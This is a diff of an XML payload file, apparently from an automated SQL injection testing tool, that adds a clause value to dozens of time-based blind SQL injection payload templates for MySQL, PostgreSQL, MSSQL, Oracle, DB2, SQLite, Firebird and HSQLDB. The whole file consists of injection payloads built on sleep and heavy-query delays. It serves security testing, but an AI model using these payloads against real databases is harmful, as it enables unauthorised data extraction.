<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request> <request>
@@ -150,7 +150,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request> <request>
@@ -171,7 +171,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector> <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request> <request>
@@ -191,7 +191,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request> <request>
@@ -211,7 +211,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector> <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request> <request>
@@ -232,7 +232,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request> <request>
@@ -253,7 +253,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
@@ -273,7 +273,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
@@ -294,7 +294,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector> <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request> <request>
@@ -314,7 +314,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector> <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request> <request>
@@ -335,7 +335,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector> <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request> <request>
@@ -355,7 +355,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector> <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request> <request>
@@ -374,7 +374,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector> <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request> <request>
@@ -394,7 +394,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector> <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request> <request>
@@ -414,7 +414,7 @@
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -434,7 +434,7 @@
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -454,7 +454,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -475,7 +475,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -496,7 +496,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -515,7 +515,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -534,7 +534,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -554,7 +554,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -617,7 +617,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -638,7 +638,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -659,7 +659,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -681,7 +681,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -703,7 +703,7 @@
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -722,7 +722,7 @@
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -741,7 +741,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -761,7 +761,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -781,7 +781,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -800,7 +800,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -819,7 +819,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -839,7 +839,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -859,7 +859,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector> <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request> <request>
@@ -878,7 +878,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector> <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request> <request>
@@ -897,7 +897,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector> <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request> <request>
@@ -917,7 +917,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector> <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request> <request>
@@ -937,7 +937,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>2</risk> <risk>2</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -957,7 +957,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -977,7 +977,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -998,7 +998,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -1019,7 +1019,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector> <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request> <request>
@@ -1039,7 +1039,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector> <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request> <request>
@@ -1059,7 +1059,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector> <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request> <request>
@@ -1080,7 +1080,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector> <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request> <request>
@@ -1101,7 +1101,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector> <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request> <request>
@@ -1120,7 +1120,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector> <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request> <request>
@@ -1139,7 +1139,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
